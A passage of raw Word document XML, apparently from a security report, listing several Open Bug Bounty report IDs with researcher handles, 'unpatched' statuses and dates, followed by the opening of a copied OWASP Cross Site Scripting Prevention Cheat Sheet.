            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="false"/>
              <w:rPr>
                <w:color w:val="707B84"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="278ABA"/>
                <w:sz w:val="21"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText>HYPERLINK "https://www.openbugbounty.org/researchers/xav0/"</w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="278ABA"/>
                <w:sz w:val="21"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>xav0</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="000000" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="000000" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="DDDDDD" w:val="single" w:sz="6" w:space="0"/>
              <w:right w:color="000000" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:pBdr/>
              <w:bidi w:val="false"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="707B84"/>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="C1272C"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>unpatched</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="960" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="000000" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="000000" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="DDDDDD" w:val="single" w:sz="6" w:space="0"/>
              <w:right w:color="000000" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:pBdr/>
              <w:bidi w:val="false"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="707B84"/>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="707B84"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>27.08.2020</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="525"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2999"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bidi w:val="false"/>
              <w:spacing w:line="312"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="278ABA"/>
                <w:sz w:val="18"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText>HYPERLINK "https://www.openbugbounty.org/reports/1063655/"</w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="278ABA"/>
                <w:sz w:val="18"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>OBB-1063655</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3150"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bidi w:val="false"/>
              <w:rPr>
                <w:color w:val="707B84"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="278ABA"/>
                <w:sz w:val="21"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText>HYPERLINK "https://www.openbugbounty.org/researchers/Gh05tPT/"</w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="278ABA"/>
                <w:sz w:val="21"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Gh05tPT</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680"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pBdr/>
              <w:bidi w:val="false"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="707B84"/>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="C1272C"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>unpatched</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="960"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pBdr/>
              <w:bidi w:val="false"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="707B84"/>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="707B84"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>09.01.2020</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="525"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2999" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="000000" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="000000" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="DDDDDD" w:val="single" w:sz="6" w:space="0"/>
              <w:right w:color="000000" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="false"/>
              <w:spacing w:line="312"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="278ABA"/>
                <w:sz w:val="18"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText>HYPERLINK "https://www.openbugbounty.org/reports/312054/"</w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="278ABA"/>
                <w:sz w:val="18"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>OBB-312054</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3150" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="000000" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="000000" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="DDDDDD" w:val="single" w:sz="6" w:space="0"/>
              <w:right w:color="000000" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:bidi w:val="false"/>
              <w:rPr>
                <w:color w:val="707B84"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="278ABA"/>
                <w:sz w:val="21"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText>HYPERLINK "https://www.openbugbounty.org/researchers/Y4r4G_/"</w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="278ABA"/>
                <w:sz w:val="21"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Y4r4G_</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="000000" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="000000" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="DDDDDD" w:val="single" w:sz="6" w:space="0"/>
              <w:right w:color="000000" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:pBdr/>
              <w:bidi w:val="false"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="707B84"/>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="C1272C"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>unpatched</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="960" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="000000" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="000000" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="DDDDDD" w:val="single" w:sz="6" w:space="0"/>
              <w:right w:color="000000" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:pBdr/>
              <w:bidi w:val="false"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="707B84"/>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="707B84"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>25.09.2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="525"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2999"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bidi w:val="false"/>
              <w:spacing w:line="312"/>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="278ABA"/>
                <w:sz w:val="18"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText>HYPERLINK "https://www.openbugbounty.org/reports/197026/"</w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="278ABA"/>
                <w:sz w:val="18"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>OBB-197026</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3150"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bidi w:val="false"/>
              <w:rPr>
                <w:color w:val="707B84"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="278ABA"/>
                <w:sz w:val="21"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText>HYPERLINK "https://www.openbugbounty.org/researchers/Disst/"</w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="278ABA"/>
                <w:sz w:val="21"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>Disst</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1680"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pBdr/>
              <w:bidi w:val="false"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="707B84"/>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="C1272C"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>unpatched</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="960" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="000000" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="000000" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="DDDDDD" w:val="single" w:sz="6" w:space="0"/>
              <w:right w:color="000000" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:shd w:fill="F4F7F9" w:val="clear" w:color="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:pBdr/>
              <w:bidi w:val="false"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="707B84"/>
                <w:sz w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
                <w:color w:val="707B84"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>08.12.2016</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:strike w:val="false"/>
          <w:color w:val="575756"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:u w:val="none"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="853610"/>
        <w:tblW w:w="8775" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="210" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5084"/>
        <w:gridCol w:w="3690"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="252"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5084" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:right w:color="575756" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="74" w:type="dxa"/>
              <w:left w:w="149" w:type="dxa"/>
              <w:bottom w:w="74" w:type="dxa"/>
              <w:right w:w="149" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distR="0" distB="0" distL="0">
                  <wp:extent cx="5824690" cy="461958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824690" cy="4619582"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3690" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:left w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="575756" w:val="none" w:sz="0" w:space="0"/>
              <w:right w:color="575756" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="74" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="74" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:pBdr/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:color w:val="575756"/>
                <w:sz w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distR="0" distB="0" distL="0">
            <wp:extent cx="5943600" cy="48613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4861350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">  OWASP PREVENTION RULES :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:line="312" w:after="550"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="44"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Cross Site Scripting Prevention Cheat Sheet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="44"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText>HYPERLINK "https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#cross-site-scripting-prevention-cheat-sheet"</w:instrText>
        <w:fldChar w:fldCharType="separate"/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="44"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>¶</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="25" w:name="_Tocxkmhro9x6bxg"/>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:line="336" w:after="220" w:before="550"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="34"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="34"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText>HYPERLINK "https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#introduction"</w:instrText>
        <w:fldChar w:fldCharType="separate"/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="34"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>¶</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="26" w:name="_Tocfvg7n72ec05d"/>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>This cheat sheet provides guidance to prevent XSS vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Cross-Site Scripting (XSS) is a misnomer. The name originated from early versions of the attack where stealing data cross-site was the primary focus. Since then, it has extended to include injection of basically any content, but we still refer to this as XSS. XSS is serious and can lead to account impersonation, observing user behaviour, loading external content, stealing sensitive data, and more.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="true"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>This cheatsheet is a list of techniques to prevent or limit the impact of XSS. No single technique will solve XSS. Using the right combination of defensive techniques is necessary to prevent XSS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:line="336" w:after="220" w:before="550"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="34"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Framework Security</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="27" w:name="_Toc43d4elms6boo"/>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
